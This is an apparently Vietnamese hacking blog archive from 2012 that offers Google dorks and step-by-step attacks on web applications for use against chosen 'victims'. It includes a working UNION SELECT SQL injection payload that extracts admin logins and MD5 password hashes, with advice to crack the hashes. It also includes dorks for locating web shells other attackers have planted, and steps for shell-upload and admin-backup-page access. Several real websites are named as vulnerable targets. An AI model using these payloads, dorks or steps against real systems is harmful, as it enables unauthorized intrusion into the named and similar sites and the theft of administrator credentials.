Hiển thị các bài đăng có nhãn New Bugs. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn New Bugs. Hiển thị tất cả bài đăng

Chủ Nhật, 17 tháng 6, 2012

[Google Dork] SQl - Public 16/6


Google Dork : inurl:Default.aspx?PageID= 

Dang khai thác đối với aspx ở dork này tương tự như trong tut sau:

Sau đây là 1 số site dính lỗi này:

www.sagiang.com.vn/Default.aspx?pageid=57'               



Thứ Năm, 31 tháng 5, 2012

[Bug] WebX (showsubpage.asp) SQLI

1. Google dork:   

inurl:"showsubpage.asp" "Powered By: WebX" 


2. Khai thác


-  Thêm Query 

null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
 
  vào sau  http://www.victim.com/showsubpage.asp?subid=
 

- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin

Ví dụ: 

http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
 

 
-  Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google

Thứ Ba, 21 tháng 2, 2012

Dork Tìm Kiếm Shell Trên Google




Với công cụ tìm kiếm google soleil có thể tìm thấy một số lượng shell lớn trên các site đã được hacker nào đó upload lên từ trước qua một số Dork như:

"Index of /sh3llZ"
"/sh3llZ/uploadshell/uploadshell.php"
intitle:index of/sh3llZ 



Thứ Bảy, 18 tháng 2, 2012

Một Số Bug - Dork Upload Shell



I  -  TailoredWeb SheLL Upload Vulnerability 
 
           
     1-      Google Dork : 

    "inurl:simple-upload-53.php"

     2-    Chọn victim, sẽ có link như sau:

OR

Ví dụ:






Thứ Sáu, 17 tháng 2, 2012

Bug Dork Upload Shell

B1. Sử dụng dork sau vào google

allinurl:"index.php?Act=Merchants"

B2. Chọn 1 victim bất kỳ

http://www.vhmnetwork.com/index.php?Act=Merchants

B3. Thay đường path trên thành:

http://www.vhmnetwork.com/admin/backupstart.php